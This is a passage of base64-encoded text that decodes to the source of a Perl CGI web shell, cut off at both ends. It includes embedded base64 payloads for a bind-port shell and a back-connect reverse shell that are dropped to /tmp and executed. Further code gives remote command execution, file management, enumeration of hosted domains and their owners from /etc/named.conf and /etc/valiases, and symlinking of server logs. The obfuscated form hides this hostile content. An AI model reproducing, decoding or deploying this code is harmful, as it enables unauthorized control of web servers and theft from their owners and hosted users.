aWEpwYm1adk9pQW5PeUJwWkR0bFkyaHZPMlZqYUc4Z0oxc3JYU0JFYVhKbFkzUnZjbms2SUNjN0lIQjNaRHRsWTJodk95QmxZMmh2SUNkYksxMGdVMmhsYkd3NklDYzdKRk5vWld4c0lpazdEUXBqYkc5elpTQlRUME5MUlZRNyI7CgkkYmluZHBlcmw9Ikl5RXZkWE55TDJKcGJpOXdaWEpzRFFwMWMyVWdVMjlqYTJWME93MEtKRUZTUjBNOVFFRlNSMVk3RFFva2NHOXlkQWs5SUNSQlVrZFdXekJkT3cwS0pIQnliM1J2Q1QwZ1oyVjBjSEp2ZEc5aWVXNWhiV1VvSjNSamNDY3BPdzBLSkZOb1pXeHNDVDBnSWk5aWFXNHZZbUZ6YUNJN0RRcHpiMk5yWlhRb1UwVlNWa1ZTTENCUVJsOUpUa1ZVTENCVFQwTkxYMU5VVWtWQlRTd2dKSEJ5YjNSdktXOXlJR1JwWlNBaWMyOWphMlYwT2lRaElqc05Dbk5sZEhOdlkydHZjSFFvVTBWU1ZrVlNMQ0JUVDB4ZlUwOURTMFZVTENCVFQxOVNSVlZUUlVGRVJGSXNJSEJoWTJzb0ltd2lMQ0F4S1NsdmNpQmthV1VnSW5ObGRITnZZMnR2Y0hRNklDUWhJanNOQ21KcGJtUW9VMFZTVmtWU0xDQnpiMk5yWVdSa2NsOXBiaWdrY0c5eWRDd2dTVTVCUkVSU1gwRk9XU2twYjNJZ1pHbGxJQ0ppYVc1a09pQWtJU0k3RFFwc2FYTjBaVzRvVTBWU1ZrVlNMQ0JUVDAxQldFTlBUazRwQ1FsdmNpQmthV1VnSW14cGMzUmxiam9nSkNFaU93MEtabTl5S0RzZ0pIQmhaR1J5SUQwZ1lXTmpaWEIwS0VOTVNVVk9WQ3dnVTBWU1ZrVlNLVHNnWTJ4dmMyVWdRMHhKUlU1VUtRMEtldzBLQ1c5d1pXNG9VMVJFU1U0c0lDSStKa05NU1VWT1ZDSXBPdzBLQ1c5d1pXNG9VMVJFVDFWVUxDQWlQaVpEVEVsRlRsUWlLVHNOQ2dsdmNHVnVLRk5VUkVWU1Vpd2dJajRtUTB4SlJVNVVJaWs3RFFvSmMzbHpkR1Z0S0NKMWJuTmxkQ0JJU1ZOVVJrbE1SVHNnZFc1elpYUWdVMEZXUlVoSlUxUWdPMlZqYUc4Z0oxc3JYU0JUZVhOMFpXMXBibVp2T2lBbk95QjFibUZ0WlNBdFlUdGxZMmh2TzJWamFHOGdKMXNyWFNCVmMyVnlhVzVtYnpvZ0p6c2dhV1E3WldOb2J6dGxZMmh2SUNkYksxMGdSR2x5WldOMGIzSjVPaUFuT3lCd2QyUTdaV05vYnpzZ1pXTm9ieUFuV3l0ZElGTm9aV3hzT2lBbk95UlRhR1ZzYkNJcE93MEtDV05zYjNObEtGTlVSRWxPS1RzTkNnbGpiRzl6WlNoVFZFUlBWVlFwT3cwS0NXTnNiM05sS0ZOVVJFVlNVaWs3RFFwOURRbz0iOwoKCSRDbGllbnRBZGRyID0gJGlueydjbGllbnRhZGRyJ307CgkkQ2xpZW50UG9ydCA9IGludCgkaW57J2NsaWVudHBvcnQnfSk7CglpZigkQ2xpZW50UG9ydCBlcSAwKQoJewoJCXJldHVybiAmQmFja0JpbmRGb3JtOwoJfWVsc2lmKCEkQ2xpZW50QWRkciBlcSAiIikKCXsKCQkkRGF0YT1kZWNvZGVfYmFzZTY0KCRiYWNrcGVybCk7CgkJaWYoLXcgIi90bXAvIikKCQl7CgkJCSRGaWxlPSIvdG1wL2JhY2tjb25uZWN0LnBsIjsJCgkJfWVsc2UKCQl7CgkJCSRGaWxlPSRDdXJyZW50RGlyLiRQYXRoU2VwLiJiYWNrY29ubmVjdC5wbCI7CgkJfQoJCW9wZW4oRklMRSwgIj4kRmlsZSIpOwoJCXByaW50IEZJTEUgJERhdGE7CgkJY2xvc2UgRklMRTsKCQlzeXN0ZW0oInBlcmwgYmFja2Nvbm5lY3QucGwgJENsaWVudEFkZHIgJENsaWVudFBvcnQiKTsKCQl1bmxpbmsoJEZpbGUpOwoJCWV4aXQgMDsKCX1lbHNlCgl7CgkJJERhdGE9ZGVjb2RlX2Jhc2U2NCgkYmluZHBlcmwpOwoJCWlmKC13ICIvdG1wIikKCQl7CgkJCSRGaWxlPSIvdG1wL2JpbmRwb3J0LnBsIjsJCgkJfWVsc2UKCQl7CgkJCSRGaWxlPSRDdXJyZW50RGlyLiRQYXRoU2VwLiJiaW5kcG9ydC5wbCI7CgkJfQoJCW9wZW4oRklMRSwgIj4kRmlsZSIpOwoJCXByaW50IEZJTEUgJERhdGE7CgkJY2xvc2UgRklMRTsKCQlzeXN0ZW0oInBlcmwgYmluZHBvcnQucGwgJENsaWVudFBvcnQiKTsKCQl1bmxpbmsoJEZpbGUpOwoJCWV4aXQgMDsKCX0KfQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgIEFycmF5IExpc3QgRGlyZWN0b3J5CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFJtRGlyKCQpIAp7CglteSAkZGlyID0gc2hpZnQ7CiAgICBpZihvcGVuZGlyKERJUiwkZGlyKSkKCXsKCQl3aGlsZSgkZmlsZSA9IHJlYWRkaXIoRElSKSkKCQl7CgkJCWlmKCgkZmlsZSBuZSAiLiIpICYmICgkZmlsZSBuZSAiLi4iKSkKCQkJewoJCQkJJGZpbGU9ICRkaXIuJFBhdGhTZXAuJGZpbGU7CgkJCQlpZigtZCAkZmlsZSkKCQkJCXsKCQkJCQkmUm1EaXIoJGZpbGUpOwoJCQkJfQoJCQkJZWxzZQoJCQkJewoJCQkJCXVubGluaygkZmlsZSk7CgkJCQl9CgkJCX0KCQl9CgkJY2xvc2VkaXIoRElSKTsKCX0KCWlmKCFybWRpcigkZGlyKSkKCXsKCQkKCX0KfQpzdWIgRmlsZU93bmVyKCQpCnsKCW15ICRmaWxlID0gc2hpZnQ7CglpZigtZSAkZmlsZSkKCXsKCQkoJHVpZCwkZ2lkKSA9IChzdGF0KCRmaWxlKSlbNCw1XTsKCQlpZigkV2luTlQpCgkJewoJCQlyZXR1cm4gIj8/PyI7CgkJfQoJCWVsc2UKCQl7CgkJCSRuYW1lPWdldHB3dWlkKCR1aWQpOwoJCQkkZ3JvdXA9Z2V0Z3JnaWQoJGdpZCk7CgkJCXJldHVybiAkbmFtZS4iLyIuJGdyb3VwOwoJCX0KCX0KCXJldHVybiAiPz8/IjsKfQpzdWIgUGFyZW50Rm9sZGVyKCQpCnsKCW15ICRwYXRoID0gc2hpZnQ7CglteSAkQ29tbSA9ICJjZCBcIiRDdXJyZW50RGlyXCIiLiRDbWRTZXAuImNkIC4uIi4kQ21kU2VwLiRDbWRQd2Q7CgljaG9wKCRwYXRoID0gYCRDb21tYCk7CglyZXR1cm4gJHBhdGg7Cn0Kc3ViIEZpbGVQZXJtcygkKQp7CglteSAkZmlsZSA9IHNoaWZ0OwoJbXkgJHVyID0gIi0iOwoJbXkgJHV3ID0gIi0iOwoJaWYoLWUgJGZpbGUpCgl7CgkJaWYoJFdpbk5UKQoJCXsKCQkJaWYoLXIgJGZpbGUpeyAkdXIgPSAiciI7IH0KCQkJaWYoLXcgJGZpbGUpeyAkdXcgPSAidyI7IH0KCQkJcmV0dXJuICR1ciAuICIgLyAiIC4gJHV3OwoJCX1lbHNlCgkJewoJCQkkbW9kZT0oc3RhdCgkZmlsZSkpWzJdOwoJCQkkcmVzdWx0ID0gc3ByaW50ZigiJTA0byIsICRtb2RlICYgMDc3NzcpOwoJCQlyZXR1cm4gJHJlc3VsdDsKCQl9Cgl9CglyZXR1cm4gIjAwMDAiOwp9CnN1YiBGaWxlTGFzdE1vZGlmaWVkKCQpCnsKCW15ICRmaWxlID0gc2hpZnQ7CglpZigtZSAkZmlsZSkKCXsKCQkoJGxhKSA9IChzdGF0KCRmaWxlKSlbOV07CgkJKCRkLCRtLCR5LCRoLCRpKSA9IChsb2NhbHRpbWUoJGxhKSlbMyw0LDUsMiwxXTsKCQkkeSA9ICR5ICsgMTkwMDsKCQlAbW9udGggPSBxdy8xIDIgMyA0IDUgNiA3IDggOSAxMCAxMSAxMi87CgkJJGxtdGltZSA9IHNwcmludGYoIiUwMmQvJXMvJTRkICUwMmQ6JTAyZCIsJGQsJG1vbnRoWyRtXSwkeSwkaCwkaSk7CgkJcmV0dXJuICRsbXRpbWU7Cgl9CglyZXR1cm4gIj8/PyI7Cn0Kc3ViIEZpbGVTaXplKCQpCnsKCW15ICRmaWxlID0gc2hpZnQ7CglpZigtZiAkZmlsZSkKCXsKCQlyZXR1cm4gLXMgJGZpbGU7Cgl9CglyZXR1cm4gIjAiOwoKfQpzdWIgUGFyc2VGaWxlU2l6ZSgkKQp7CglteSAkc2l6ZSA9IHNoaWZ0OwoJaWYoJHNpemUgPD0gMTAyNCkKCXsKCQlyZXR1cm4gJHNpemUuICIgQiI7Cgl9CgllbHNlCgl7CgkJaWYoJHNpemUgPD0gMTAyNCoxMDI0KSAKCQl7CgkJCSRzaXplID0gc3ByaW50ZigiJS4wMmYiLCRzaXplIC8gMTAyNCk7CgkJCXJldHVybiAkc2l6ZS4iIEtCIjsKCQl9CgkJZWxzZSAKCQl7CgkJCSRzaXplID0gc3ByaW50ZigiJS4yZiIsJHNpemUgLyAxMDI0IC8gMTAyNCk7CgkJCXJldHVybiAkc2l6ZS4iIE1CIjsKCQl9Cgl9Cn0Kc3ViIHRyaW0oJCkKewoJbXkgJHN0cmluZyA9IHNoaWZ0OwoJJHN0cmluZyA9fiBzL15ccysvLzsKCSRzdHJpbmcgPX4gcy9ccyskLy87CglyZXR1cm4gJHN0cmluZzsKfQpzdWIgQWRkU2xhc2hlcygkKQp7CglteSAkc3RyaW5nID0gc2hpZnQ7Cgkkc3RyaW5nPX4gcy9cXC9cXFxcL2c7CglyZXR1cm4gJHN0cmluZzsKfQpzdWIgTGlzdERpcgp7CglteSAkcGF0aCA9ICRDdXJyZW50RGlyLiRQYXRoU2VwOwoJJHBhdGg9fiBzL1xcXFwvXFwvZzsKCW15ICRyZXN1bHQgPSAiPGZvcm0gbmFtZT0nZicgYWN0aW9uPSckU2NyaXB0TG9jYXRpb24nPjxzcGFuIHN0eWxlPSdmb250OiAxMXB0IFZlcmRhbmE7IGZvbnQtd2VpZ2h0OiBib2xkOyc+UGF0aDogWyAiLiZBZGRMaW5rRGlyKCJndWkiKS4iIF0gPC9zcGFuPjxpbnB1dCB0eXBlPSd0ZXh0JyBuYW1lPSdkJyBzaXplPSc0MCcgdmFsdWU9JyRDdXJyZW50RGlyJyAvPjxpbnB1dCB0eXBlPSdoaWRkZW4nIG5hbWU9J2EnIHZhbHVlPSdndWknPjxpbnB1dCBjbGFzcz0nc3VibWl0JyB0eXBlPSdzdWJtaXQnIHZhbHVlPSdDaGFuZ2UnPjwvZm9ybT4iOwoJaWYoLWQgJHBhdGgpCgl7CgkJbXkgQGZuYW1lID0gKCk7CgkJbXkgQGRuYW1lID0gKCk7CgkJaWYob3BlbmRpcihESVIsJHBhdGgpKQoJCXsKCQkJd2hpbGUoJGZpbGUgPSByZWFkZGlyKERJUikpCgkJCXsKCQkJCSRmPSRwYXRoLiRmaWxlOwoJCQkJaWYoLWQgJGYpCgkJCQl7CgkJCQkJcHVzaChAZG5hbWUsJGZpbGUpOwoJCQkJfQoJCQkJZWxzZQoJCQkJewoJCQkJCXB1c2goQGZuYW1lLCRmaWxlKTsKCQkJCX0KCQkJfQoJCQljbG9zZWRpcihESVIpOwoJCX0KCQlAZm5hbWUgPSBzb3J0IHsgbGMoJGEpIGNtcCBsYygkYikgfSBAZm5hbWU7CgkJQGRuYW1lID0gc29ydCB7IGxjKCRhKSBjbXAgbGMoJGIpIH0gQGRuYW1lOwoJCSRyZXN1bHQgLj0gIjxkaXY+PHRhYmxlIHdpZHRoPSc5MCUnIGNsYXNzPSdsaXN0ZGlyJz4KCgkJPHRyIHN0eWxlPSdiYWNrZ3JvdW5kLWNvbG9yOiAjM2UzZTNlJz48dGg+RmlsZSBOYW1lPC90aD4KCQk8dGggc3R5bGU9J3dpZHRoOjEwMHB4Oyc+RmlsZSBTaXplPC90aD4KCQk8dGggc3R5bGU9J3dpZHRoOjE1MHB4Oyc+T3duZXI8L3RoPgoJCTx0aCBzdHlsZT0nd2lkdGg6MTAwcHg7Jz5QZXJtaXNzaW9uPC90aD4KCQk8dGggc3R5bGU9J3dpZHRoOjE1MHB4Oyc+TGFzdCBNb2RpZmllZDwvdGg+CgkJPHRoIHN0eWxlPSd3aWR0aDoyNjBweDsnPkFjdGlvbjwvdGg+PC90cj4iOwoJCW15ICRzdHlsZT0ibGluZSI7CgkJbXkgJGk9MDsKCQlmb3JlYWNoIG15ICRkIChAZG5hbWUpCgkJewoJCQkkc3R5bGU9ICgkc3R5bGUgZXEgImxpbmUiKSA/ICJub3RsaW5lIjogImxpbmUiOwoJCQkkZCA9ICZ0cmltKCRkKTsKCQkJJGRpcm5hbWU9JGQ7CgkJCWlmKCRkIGVxICIuLiIpIAoJCQl7CgkJCQkkZCA9ICZQYXJlbnRGb2xkZXIoJHBhdGgpOwoJCQl9CgkJCWVsc2lmKCRkIGVxICIuIikgCgkJCXsKCQkJCSRkID0gJHBhdGg7CgkJCX0KCQkJZWxzZSAKCQkJewoJCQkJJGQgPSAkcGF0aC4kZDsKCQkJfQoJCQkkcmVzdWx0IC49ICI8dHIgY2xhc3M9JyRzdHlsZSc+CgoJCQk8dGQgaWQ9J0ZpbGVfJGknIHN0eWxlPSdmb250OiAxMXB0IFZlcmRhbmE7IGZvbnQtd2VpZ2h0OiBib2xkOyc+PGEgIGhyZWY9Jz9hPWd1aSZkPSIuJGQuIic+WyAiLiRkaXJuYW1lLiIgXTwvYT48L3RkPiI7CgkJCSRyZXN1bHQgLj0gIjx0ZD5ESVI8L3RkPiI7CgkJCSRyZXN1bHQgLj0gIjx0ZCBzdHlsZT0ndGV4dC1hbGlnbjpjZW50ZXI7Jz4iLiZGaWxlT3duZXIoJGQpLiI8L3RkPiI7CgkJCSRyZXN1bHQgLj0gIjx0ZCBpZD0nRmlsZVBlcm1zXyRpJyBzdHlsZT0ndGV4dC1hbGlnbjpjZW50ZXI7JyBvbmRibGNsaWNrPVwicm1fY2htb2RfZm9ybSh0aGlzLCIuJGkuIiwnIi4mRmlsZVBlcm1zKCRkKS4iJywnIi4kZGlybmFtZS4iJylcIiA+PHNwYW4gb25jbGljaz1cImNobW9kX2Zvcm0oIi4kaS4iLCciLiRkaXJuYW1lLiInKVwiID4iLiZGaWxlUGVybXMoJGQpLiI8L3NwYW4+PC90ZD4iOwoJCQkkcmVzdWx0IC49ICI8dGQgc3R5bGU9J3RleHQtYWxpZ246Y2VudGVyOyc+Ii4mRmlsZUxhc3RNb2RpZmllZCgkZCkuIjwvdGQ+IjsKCQkJJHJlc3VsdCAuPSAiPHRkIHN0eWxlPSd0ZXh0LWFsaWduOmNlbnRlcjsnPjxhIGhyZWY9J2phdmFzY3JpcHQ6cmV0dXJuIGZhbHNlOycgb25jbGljaz1cInJlbmFtZV9mb3JtKCRpLCckZGlybmFtZScsJyIuJkFkZFNsYXNoZXMoJkFkZFNsYXNoZXMoJGQpKS4iJylcIj5SZW5hbWU8L2E+ICB8IDxhIG9uY2xpY2s9XCJpZighY29uZmlybSgnUmVtb3ZlIGRpcjogJGRpcm5hbWUgPycpKSB7IHJldHVybiBmYWxzZTt9XCIgaHJlZj0nP2E9Z3VpJmQ9JHBhdGgmcmVtb3ZlPSRkaXJuYW1lJz5SZW1vdmU8L2E+PC90ZD4iOwoJCQkkcmVzdWx0IC49ICI8L3RyPiI7CgkJCSRpKys7CgkJfQoJCWZvcmVhY2ggbXkgJGYgKEBmbmFtZSkKCQl7CgkJCSRzdHlsZT0gKCRzdHlsZSBlcSAibGluZSIpID8gIm5vdGxpbmUiOiAibGluZSI7CgkJCSRmaWxlPSRmOwoJCQkkZiA9ICRwYXRoLiRmOwoJCQkkdmlldyA9ICI/ZGlyPSIuJHBhdGguIiZ2aWV3PSIuJGY7CgkJCSRyZXN1bHQgLj0gIjx0ciBjbGFzcz0nJHN0eWxlJz48dGQgaWQ9J0ZpbGVfJGknIHN0eWxlPSdmb250OiAxMXB0IFZlcmRhbmE7Jz48YSBocmVmPSc/YT1jb21tYW5kJmQ9Ii4kcGF0aC4iJmM9ZWRpdCUyMCIuJGZpbGUuIic+Ii4kZmlsZS4iPC9hPjwvdGQ+IjsKCQkJJHJlc3VsdCAuPSAiPHRkPiIuJlBhcnNlRmlsZVNpemUoJkZpbGVTaXplKCRmKSkuIjwvdGQ+IjsKCQkJJHJlc3VsdCAuPSAiPHRkIHN0eWxlPSd0ZXh0LWFsaWduOmNlbnRlcjsnPiIuJkZpbGVPd25lcigkZikuIjwvdGQ+IjsKCQkJJHJlc3VsdCAuPSAiPHRkIGlkPSdGaWxlUGVybXNfJGknIHN0eWxlPSd0ZXh0LWFsaWduOmNlbnRlcjsnIG9uZGJsY2xpY2s9XCJybV9jaG1vZF9mb3JtKHRoaXMsIi4kaS4iLCciLiZGaWxlUGVybXMoJGYpLiInLCciLiRmaWxlLiInKVwiID48c3BhbiBvbmNsaWNrPVwiY2htb2RfZm9ybSgkaSwnJGZpbGUnKVwiID4iLiZGaWxlUGVybXMoJGYpLiI8L3NwYW4+PC90ZD4iOwoJCQkkcmVzdWx0IC49ICI8dGQgc3R5bGU9J3RleHQtYWxpZ246Y2VudGVyOyc+Ii4mRmlsZUxhc3RNb2RpZmllZCgkZikuIjwvdGQ+IjsKCQkJJHJlc3VsdCAuPSAiPHRkIHN0eWxlPSd0ZXh0LWFsaWduOmNlbnRlcjsnPjxhIGhyZWY9Jz9hPWNvbW1hbmQmZD0iLiRwYXRoLiImYz1lZGl0JTIwIi4kZmlsZS4iJz5FZGl0PC9hPiB8IDxhIGhyZWY9J2phdmFzY3JpcHQ6cmV0dXJuIGZhbHNlOycgb25jbGljaz1cInJlbmFtZV9mb3JtKCRpLCckZmlsZScsJ2YnKVwiPlJlbmFtZTwvYT4gfCA8YSBocmVmPSc/YT1kb3dubG9hZCZvPWdvJmY9Ii4kZi4iJz5Eb3dubG9hZDwvYT4gfCA8YSBvbmNsaWNrPVwiaWYoIWNvbmZpcm0oJ1JlbW92ZSBmaWxlOiAkZmlsZSA/JykpIHsgcmV0dXJuIGZhbHNlO31cIiBocmVmPSc/YT1ndWkmZD0kcGF0aCZyZW1vdmU9JGZpbGUnPlJlbW92ZTwvYT48L3RkPiI7CgkJCSRyZXN1bHQgLj0gIjwvdHI+IjsKCQkJJGkrKzsKCQl9CgkJJHJlc3VsdCAuPSAiPC90YWJsZT48L2Rpdj4iOwoJfQoJcmV0dXJuICRyZXN1bHQ7Cn0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFRyeSB0byBWaWV3IExpc3QgVXNlcgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBWaWV3RG9tYWluVXNlcgp7CglvcGVuIChkb21haW5zLCAnL2V0Yy9uYW1lZC5jb25mJykgb3IgJGVycj0xOwoJbXkgQGNuenMgPSA8ZG9tYWlucz47CgljbG9zZSBkMG1haW5zOwoJbXkgJHN0eWxlPSJsaW5lIjsKCW15ICRyZXN1bHQ9IjxoNT48Zm9udCBzdHlsZT0nZm9udDogMTVwdCBWZXJkYW5hO2NvbG9yOiAjZmY5OTAwOyc+SG9hbmcgU2EgLSBUcnVvbmcgU2E8L2ZvbnQ+PC9oNT4iOwoJaWYgKCRlcnIpCgl7CgkJJHJlc3VsdCAuPSAgKCc8cD5DMHVsZG5cJ3QgQnlwYXNzIGl0ICwgU29ycnk8L3A+Jyk7CgkJcmV0dXJuICRyZXN1bHQ7Cgl9ZWxzZQoJewoJCSRyZXN1bHQgLj0gJzx0YWJsZT48dHI+PHRoPkRvbWFpbnM8L3RoPiA8dGg+VXNlcjwvdGg+PC90cj4nOwoJfQoJZm9yZWFjaCBteSAkb25lIChAY256cykKCXsKCQlpZigkb25lID1+IG0vLio/em9uZSAiKC4qPykiIHsvKQoJCXsJCgkJCSRzdHlsZT0gKCRzdHlsZSBlcSAibGluZSIpID8gIm5vdGxpbmUiOiAibGluZSI7CgkJCSRmaWxlbmFtZT0gIi9ldGMvdmFsaWFzZXMvIi4kb25lOwoJCQkkb3duZXIgPSBnZXRwd3VpZCgoc3RhdCgkZmlsZW5hbWUpKVs0XSk7CgkJCSRyZXN1bHQgLj0gJzx0ciBjbGFzcz0iJHN0eWxlIiB3aWR0aD01MCU+PHRkPicuJG9uZS4nIDwvdGQ+PHRkPiAnLiRvd25lci4nPC90ZD48L3RyPic7CgkJfQoJfQoJJHJlc3VsdCAuPSAnPC90YWJsZT4nOwoJcmV0dXJuICRyZXN1bHQ7Cn0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFZpZXcgTG9nCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFZpZXdMb2cKewoJaWYoJFdpbk5UKQoJewoJCXJldHVybiAiPGgyPjxmb250IHN0eWxlPSdmb250OiAyMHB0IFZlcmRhbmE7Y29sb3I6ICNmZjk5MDA7Jz5Eb24ndCBydW4gb24gV2luZG93czwvZm9udD48L2gyPiI7Cgl9CglteSAkcmVzdWx0PSI8dGFibGU+PHRyPjx0aD5QYXRoIExvZzwvdGg+PHRoPlN1Ym1pdDwvdGg+PC90cj4iOwoJbXkgQHBhdGhsb2c9KAoJCQkJJy91c3IvbG9jYWwvYXBhY2hlL2xvZ3MvZXJyb3JfbG9nJywKCQkJCScvdmFyL2xvZy9odHRwZC9lcnJvcl9sb2cnLAoJCQkJJy91c3IvbG9jYWwvYXBhY2hlL2xvZ3MvYWNjZXNzX2xvZycKCQkJCSk7CglteSAkaT0wOwoJbXkgJHBlcm1zOwoJbXkgJHNsOwoJZm9yZWFjaCBteSAkbG9nIChAcGF0aGxvZykKCXsKCQlpZigtdyAkbG9nKQoJCXsKCQkJJHBlcm1zPSJPSyI7CgkJfWVsc2UKCQl7CgkJCWNob3AoJHNsID0gYGxuIC1zICRsb2cgZXJyb3JfbG9nXyRpYCk7CgkJCWlmKCZ0cmltKCRscykgZXEgIiIpCgkJCXsKCQkJCWlmKC1yICRscykKCQkJCXsKCQkJCQkkcGVybXM9Ik9LIjsKCQkJCQkkbG9nPSJlcnJvcl9sb2dfIi4kaTsKCQkJCX0KCQkJfWVsc2UKCQkJewoJCQkJJHBlcm1zPSI8Zm9udCBzdHlsZT0nY29sb3I6IHJlZDsnPkNhbmNlbDxmb250PiI7CgkJCX0KCQl9CgkJJHJlc3VsdCAuPTw8RU5EOwoJCTx0cj4KCgkJCTxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiPgoJCQk8dGQ+PGlucHV0IHR5cGU9InRleHQiIG9ua2V5dXA9ImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdsb2dfJGknKS52YWx1ZT0nbGVzcyAnICsgdGhpcy52YWx1ZTsiIHZhbHVlPSIkbG9nIiBzaXplPSc1MCcvPjwvdGQ+CgkJCTx0ZD48aW5wdXQgY2xhc3M9InN1Ym1pdCIgdHlwZT0ic3VibWl0IiB2YWx1ZT0iVHJ5IiAvPjwvdGQ+CgkJCTxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJsb2dfJGkiIG5hbWU9ImMiIHZhbHVlPSJsZXNzICRsb2ciLz4KCQkJPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImNvbW1hbmQiIC8+CgkJCTxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciIgLz4KCQkJPC9mb3JtPgoJCQk8dGQ+JHBlcm1zPC90ZD4KCgkJPC90cj4KRU5ECgkJJGkrKzsKCX0KCSRyZXN1bHQgLj0iPC90YWJsZT4iOwoJcmV0dXJuICRyZXN1bHQ7Cn0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIE1haW4gUHJvZ3JhbSAtIEV4ZWN1dGlvbiBTdGFydHMgSGVyZQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiZSZWFkUGFyc2U7CiZHZXRDb29raWVzOwoKJFNjcmlwdExvY2F0aW9uID0gJEVOVnsnU0NSSVBUX05BTUUnfTsKJFNlcnZlck5hbWUgPSAkRU5WeydTRVJWRVJfTkFNRSd9OwokTG9naW5QYXNzd29yZCA9ICRpbnsncCd9OwokUnVuQ29tbWFuZCA9ICRpbnsnYyd9OwokVHJhbnNmZXJGaWxlID0gJGlueydmJ307CiRPcHRpb25zID0gJGlueydvJ307CiRBY3Rpb24gPSAkaW57J2EnfTsKCiRBY3Rpb24gPSAiY29tbWFuZCIgaWYoJEFjdGlvbiBlcSAiIik7ICMgbm8gYWN0aW9uIHNwZWNpZmllZCwgdXNlIGRlZmF1bHQKCiMgZ2V0IHRoZSBkaXJlY3RvcnkgaW4gd2hpY2ggdGhlIGNvbW1hbmRzIHdpbGwgYmUgZXhlY3V0ZWQKJEN1cnJlbnREaXIgPSAmdHJpbSgkaW57J2QnfSk7CiMgbWFjIGRpbmggeHVhdCB0aG9uZyB0aW4gbmV1IGtvIGNvIGxlbmggbmFvIQokUnVuQ29tbWFuZD0gJFdpbk5UPyJkaXIiOiJkaXIgLWxpYSIgaWYoJFJ1bkNvbW1hbmQgZXEgIiIpOwpjaG9wKCRDdXJyZW50RGlyID0gYCRDbWRQd2RgKSBpZigkQ3VycmVudERpciBlcSAiIik7CgokTG9nZ2VkSW4gPSAkQ29va2llc3snU0FWRURQV0QnfSBlcSAkUGFzc3dvcmQ7CgppZigkQWN0aW9uIGVxICJsb2dpbiIgfHwgISRMb2dnZWRJbikgCQkjIHVzZXIgbmVlZHMvaGFzIHRvIGxvZ2luCnsKCSZQZXJmb3JtTG9naW47Cn1lbHNpZigkQWN0aW9uIGVxICJndWkiKSAjIEdVSSBkaXJlY3RvcnkKewoJJlByaW50UGFnZUhlYWRlcjsKCWlmKCEkV2luTlQpCgl7CgkJJGNobW9kPWludCgkaW57J2NobW9kJ30pOwoJCWlmKCEoJGNobW9kIGVxIDApKQoJCXsKCQkJJGNobW9kPWludCgkaW57J2NobW9kJ30pOwoJCQkkZmlsZT0kQ3VycmVudERpci4kUGF0aFNlcC4kVHJhbnNmZXJGaWxlOwoJCQljaG9wKCRyZXN1bHQ9IGBjaG1vZCAkY2htb2QgIiRmaWxlImApOwoJCQlpZigmdHJpbSgkcmVzdWx0KSBlcSAiIikKCQkJewoJCQkJcHJpbnQgIjxydW4+IERvbmUhIDwvcnVuPjxicj4iOwoJCQl9ZWxzZQoJCQl7CgkJCQlwcmludCAiPHJ1bj4gU29ycnkhIFlvdSBkb250IGhhdmUgcGVybWlzc2lvbnMhIDwvcnVuPjxicj4iOwoJCQl9CgkJfQoJfQoJJHJlbmFtZT0kaW57J3JlbmFtZSd9OwoJaWYoISRyZW5hbWUgZXEgIiIpCgl7CgkJaWYocmVuYW1lKCRUcmFuc2ZlckZpbGUsJHJlbmFtZSkpCgkJewoJCQlwcmludCAiPHJ1bj4gRG9uZSEgPC9ydW4+PGJyPiI7CgkJfWVsc2UKCQl7CgkJCXByaW50ICI8cnVuPiBTb3JyeSEgWW91IGRvbnQgaGF2ZSBwZXJtaXNzaW9ucyEgPC9ydW4+PGJyPiI7CgkJfQoJfQoJJHJlbW92ZT0kaW57J3JlbW92ZSd9OwoJaWYoJHJlbW92ZSBuZSAiIikKCXsKCQkkcm0gPSAkQ3VycmVudERpci4kUGF0aFNlcC4kcmVtb3ZlOwoJCWlmKC1kICRybSkKCQl7CgkJCSZSbURpcigkcm0pOwoJCX1lbHNlCgkJewoJCQlpZih1bmxpbmsoJHJtKSkKCQkJewoJCQkJcHJpbnQgIjxydW4+IERvbmUhIDwvcnVuPjxicj4iOwoJCQl9ZWxzZQoJCQl7CgkJCQlwcmludCAiPHJ1bj4gU29ycnkhIFlvdSBkb250IGhhdmUgcGVybWlzc2lvbnMhIDwvcnVuPjxicj4iOwoJCQl9CQkJCgkJfQoJfQoJcHJpbnQgJkxpc3REaXI7Cgp9CmVsc2lmKCRBY3Rpb24gZXEgImNvbW1hbmQiKQkJCQkgCSMgdXNlciB3YW50cyB0byBydW4gYSBjb21tYW5kCnsKCSZQcmludFBhZ2VIZWFkZXIoImMiKTsKCXByaW50ICZFeGVjdXRlQ29tbWFuZDsKfQplbHNpZigkQWN0aW9uIGVxICJzYXZlIikJCQkJIAkjIHVzZX